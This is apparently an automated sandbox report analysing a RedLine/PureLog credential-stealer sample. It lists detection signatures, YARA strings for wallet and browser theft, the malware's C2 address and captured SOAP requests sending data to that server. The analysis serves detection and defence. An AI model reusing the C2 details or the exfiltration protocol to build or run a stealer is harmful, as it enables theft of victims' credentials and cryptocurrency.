Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MfzXU6tKOq.exe

Overview

General Information

Sample name:MfzXU6tKOq.exe
renamed because original name is a hash value
Original sample name:3D63B777F65056B236BA51180CD37CE0.exe
Analysis ID:1568226
MD5:3d63b777f65056b236ba51180cd37ce0
SHA1:94a4653797f942c4f2eb1ac36707d66e5cef401f
SHA256:d2ddb7d466186ab167e6799198ef76d678ad0ac098a5deacb5a99383aa54b717
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

PureLog Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • MfzXU6tKOq.exe (PID: 1860 cmdline: "C:\Users\user\Desktop\MfzXU6tKOq.exe" MD5: 3D63B777F65056B236BA51180CD37CE0)
    • RegSvcs.exe (PID: 744 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["185.222.58.82:55615"], "Bot Id": "cheat"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1841259145.0000000004FA0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
            • 0x133ca:$a4: get_ScannedWallets
            • 0x12228:$a5: get_ScanTelegram
            • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
            • 0x10e6a:$a7: <Processes>k__BackingField
            • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
            • 0x1079e:$a9: <ScanFTP>k__BackingField
            00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 13 entries
              SourceRuleDescriptionAuthorStrings
              0.2.MfzXU6tKOq.exe.4fa0000.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.MfzXU6tKOq.exe.340e790.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.MfzXU6tKOq.exe.4fa0000.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.MfzXU6tKOq.exe.35dbb00.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      0.2.MfzXU6tKOq.exe.35dbb00.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        Click to see the 19 entries
                        No Sigma rule has matched
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-04T13:17:21.706312+010020450001Malware Command and Control Activity Detected185.222.58.8255615192.168.2.449733TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-04T13:17:26.198581+010020460561A Network Trojan was detected185.222.58.8255615192.168.2.449733TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-04T13:17:26.198581+010020450011Malware Command and Control Activity Detected185.222.58.8255615192.168.2.449733TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-04T13:17:16.330585+010028496621Malware Command and Control Activity Detected192.168.2.449733185.222.58.8255615TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-04T13:17:22.355480+010028493511Malware Command and Control Activity Detected192.168.2.449733185.222.58.8255615TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-04T13:17:29.680089+010028482001Malware Command and Control Activity Detected192.168.2.449744185.222.58.8255615TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-04T13:17:26.832291+010028493521Malware Command and Control Activity Detected192.168.2.449741185.222.58.8255615TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0.2.MfzXU6tKOq.exe.35dbb00.1.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.82:55615"], "Bot Id": "cheat"}
                        Source: MfzXU6tKOq.exeReversingLabs: Detection: 68%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: MfzXU6tKOq.exeJoe Sandbox ML: detected
                        Source: MfzXU6tKOq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: MfzXU6tKOq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: CWHy.pdb source: MfzXU6tKOq.exe
                        Source: Binary string: CWHy.pdbSHA256 source: MfzXU6tKOq.exe
                        Source: C:\Users\user\Desktop\MfzXU6tKOq.exeCode function: 4x nop then jmp 06ABE0B0h0_2_06ABDF7E

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49733 -> 185.222.58.82:55615
                        Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.82:55615 -> 192.168.2.4:49733
                        Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49733 -> 185.222.58.82:55615
                        Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.82:55615 -> 192.168.2.4:49733
                        Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.222.58.82:55615 -> 192.168.2.4:49733
                        Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49741 -> 185.222.58.82:55615
                        Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49744 -> 185.222.58.82:55615
                        Source: Malware configuration extractorURLs: 185.222.58.82:55615
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 55615
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 55615
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 55615
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49744
                        Source: global trafficTCP traffic: 192.168.2.4:49733 -> 185.222.58.82:55615
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.82:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.82:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.82:55615Content-Length: 934597Expect: 100-continueAccept-Encoding: gzip, deflate
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.82:55615Content-Length: 934589Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.82
                        Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.82:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.82:5
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.82:55615
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.82:55615/
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.82:55615t-kq
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                        Source: MfzXU6tKOq.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841237299.0000000004EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comne
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                        Source: RegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                        Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                        Source: tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drString found in binary or memory: https://www.ecosia.org/newtab/
